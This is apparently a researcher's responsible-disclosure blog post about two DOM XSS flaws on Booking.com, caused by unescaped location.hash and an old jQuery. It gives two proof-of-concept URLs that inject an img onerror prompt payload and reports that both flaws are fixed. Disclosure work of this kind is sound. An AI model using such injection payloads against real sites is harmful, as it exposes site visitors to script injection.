Booking.com B.V., part of Priceline.com (Nasdaq: PCLN), owns and operates Booking.com, the world leader in booking accommodation online. Each day, over 400,000 room nights are reserved on Booking.com, and the website attracts over 30 million unique visitors each month from both the leisure and business sectors worldwide.
On January I started receiving some phishing emails using Booking.com as bait to spread malware.
If these malicious users had the right tools - like for example a XSS vulnerability - they could infect more users. That would not be good...
After browsing a little bit the website I found out two DOM XSS vulnerabilities.
Both vulnerabilities we're explored due to the lack of escaping the location.hash and using an older version of jQuery. That way it was possible for user to inject code into a victims browser DOM.
Proof of concept #1 (iPhone landing)
http://www.booking.com/general.en-us.html?sid=c81e148e3eceef6c8e2073bc50258a1c;dcid=1;tmpl=docs/iphone_landing&=&#<img src=x onerror=prompt("xss");>
Proof of concept #2 (FAQ section)
http://www.booking.com/general.en-us.html?dcid=1&sid=c81e148e3eceef6c8e2073bc50258a1c&tmpl=docs/faqmain#<img src=x onerror=prompt("xss");>
Both issues are now fixed.
I only was able to receive any reply from Booking.com team when contacting them via Twitter. After that I established a conversation with their security team who were very effective and fast, solving both vulnerabilities on a couple of hours. They reported that they're working on making the site safer everyday and appreciate any assistance.
Thanks for that.